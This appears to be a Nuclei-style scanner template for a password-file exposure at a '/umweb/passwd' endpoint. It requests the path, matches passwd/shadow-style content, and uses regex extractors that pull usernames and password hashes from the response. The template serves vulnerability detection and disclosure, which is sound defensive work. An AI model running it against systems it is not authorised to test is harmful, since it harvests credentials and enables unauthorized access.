id: umweb-passwd-exposure

info:
  name: UMWeb Password File Exposure
  author: 如烟
  severity: high
  description: |
    The /umweb/passwd endpoint exposes sensitive password information.
    This could lead to credential disclosure and unauthorized access.
  impact: |
    Attackers can obtain sensitive password information, potentially leading to
    unauthorized system access and credential theft.
  remediation: |
    Restrict access to the /umweb/passwd endpoint or remove it if not needed.
    Implement proper authentication and authorization mechanisms.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200
  metadata:
    verified: false
    max-request: 1
  tags: exposure,password,umweb,infoleak

http:
  - method: GET
    path:
      - "{{BaseURL}}/umweb/passwd"

    headers:
      sec-ch-ua-mobile: "?0"
      Upgrade-Insecure-Requests: "1"

    matchers:
      - type: word
        words:
          - "root:"
          - "admin:"
          - "password:"
          - "passwd:"
          - "shadow:"
          - "/bin/bash"
          - "/bin/sh"
          - "/usr/bin/"
          - "/home/"
          - "/root:"
        part: body
        condition: or

      - type: regex
        regex:
          - "^[a-zA-Z0-9_-]+:[^:]*:[0-9]+:[0-9]+:"
          - "^[a-zA-Z0-9_-]+:\\$[a-zA-Z0-9./]+"
        part: body
        condition: or

      - type: status
        status:
          - 200
          - 201
          - 202
        condition: and

    extractors:
      - type: regex
        regex:
          - "root:([^:]*):[0-9]*:[0-9]*:([^:]*):([^:]*):"
          - "admin:([^:]*):[0-9]*:[0-9]*:([^:]*):([^:]*):"
          - "([a-zA-Z0-9_-]+):([^:]*):[0-9]*:[0-9]*:([^:]*):([^:]*):"
          - "([a-zA-Z0-9_-]+):\\$[a-zA-Z0-9./]+"
        part: body
        
      - type: kval
        kval:
          - "server"
          - "content-type"
        part: header